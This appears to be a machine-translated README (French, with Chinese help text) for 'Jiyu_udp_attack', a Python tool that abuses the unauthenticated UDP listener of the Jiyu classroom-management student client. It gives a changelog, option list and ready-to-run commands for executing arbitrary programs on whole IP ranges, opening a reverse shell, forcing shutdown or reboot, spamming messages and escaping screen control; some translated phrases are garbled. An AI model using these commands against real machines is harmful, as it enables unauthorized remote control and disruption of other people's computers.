Jiyu_udp_attack

• Étant donné que le terminal étudiant de Jiyu n'effectue pas d'authentification (=・ω・=) sur le paquet UDP reçu, nous pouvons construire un paquet de données spécifique que le terminal étudiant doit exécuter, réalisant ainsi l'exécution de commandes et attaquant tout étudiant en ligne dans le terminal de la salle informatique. machine.

• Python3

v1.5

• Correction d'un bug d'exécution de commande

v1.4

• Reconstruction de code, optimisation de la logique de sélection des paramètres
• La fonction Rebound Shell ajoute un port aléatoire
• Mettre à jour la documentation

v1.3

• Désactiver/restaurer le contrôle de l'écran
• Coque de support à rebond

v1.2

• corriger un bug

v1.1

• L'option -g prend en charge l'obtention du port sur lequel l'étudiant écoute.

v1.0

• première soumission

 usage:

    ------------------- Github Repositories -------------------
            https://github.com/ht0Ruial/Jiyu_udp_attack

       [-h] -ip IP [-p P] [-msg MSG] [-c C] [-l L] [-t T]
       [-e {r,s,g,nc,break,continue}]
       {r,s,g,nc,break,continue} ...

positional arguments:
  {r,s,g,nc,break,continue}
                        -e 参数的详细说明
    r                   reboot 重启
    s                   shutdown 关机
    g                   独立选项，获取当前的ip地址以及学生端监听的端口
    nc                  独立选项，反弹shell的机器需出网，退出可使用命令exit
    break               独立选项，脱离屏幕控制，需要管理员权限
    continue            独立选项，恢复屏幕控制

optional arguments:
  -h, --help            show this help message and exit
  -ip IP                ip 指定目标IP地址
  -p P                  port 指定监听端口，默认端口为4705
  -msg MSG              send_message发送消息 eg: -msg "HelloWord!"
  -c C                  command命令 eg: -c "cmd.exe /c ipconfig"
  -l L                  循环次数，默认为1
  -t T                  循环时间间隔，默认是22秒
  -e {r,s,g,nc,break,continue}
                        Extra Options加载额外的选项 eg：-e r
          

Lorsque vous utilisez le paramètre -ip pour spécifier l'adresse IP cible, vous pouvez la spécifier des manières suivantes :

• Spécifiez une seule adresse IP, telle que 192.168.80.12
• Spécifiez la plage IP, telle que 192.168.80.10-56
• Spécifiez le segment C où se trouve l'adresse IP, par exemple 192.168.80.1/24

Si le port d'écoute côté étudiant n'est pas le 4705 par défaut, vous devez utiliser le paramètre -p pour spécifier le port lors des opérations ultérieures.

 python Jiyu_udp_attack.py -e g

Les autorisations d'exécution actuelles doivent être des autorisations d'administrateur, qui sont principalement utilisées pour démarrer le service MpsSvc.

 python Jiyu_udp_attack.py -e break

 python Jiyu_udp_attack.py -e continue

Si le port d'écoute côté étudiant est 4705 , envoyez un message avec le contenu « bonjour, bébé ! » à la machine avec l'adresse IP 192.168.80.12.

 python Jiyu_udp_attack.py -ip 192.168.80.12 -msg "hello,baby!"

Si le port d'écoute côté étudiant est 4605 , vous devez utiliser le paramètre -p pour spécifier le port et envoyer un message avec le contenu "hello, baby!" à la machine avec l'adresse IP 192.168.80.12.

 python Jiyu_udp_attack.py -ip 192.168.80.12 -p 4605 -msg "hello,baby!"

Jouez avec une calculatrice pour 192.168.80.12 à 192.168.80.137

 python Jiyu_udp_attack.py -ip 192.168.80.12-137 -c calc.exe

Lors du rebond du shell, l'adresse IP ne peut être que l'adresse IP d'une certaine machine et ne peut pas être rebondie par lots. De plus, la machine doit sortir du réseau car l'exécution par lots de commandes arbitraires a été implémentée, étant donné que le rebond par lots n'a aucun sens. , il n'est pas ajouté.

 python Jiyu_udp_attack.py -ip 192.168.80.12 -e nc

Fermer

 python Jiyu_udp_attack.py -ip 192.168.80.12 -e s

Redémarrage

 python Jiyu_udp_attack.py -ip 192.168.80.12 -e r

Envoyer des messages en continu à l'aide d'une boucle
La machine 1-254 recevra un message « Bonjour, bébé ! » et continuera à s'exécuter après 50 secondes, un total de 3 fois.

    python Jiyu_udp_attack.py -ip 192.168.80.23/24 -msg "hello,baby!" -l 3 -t 50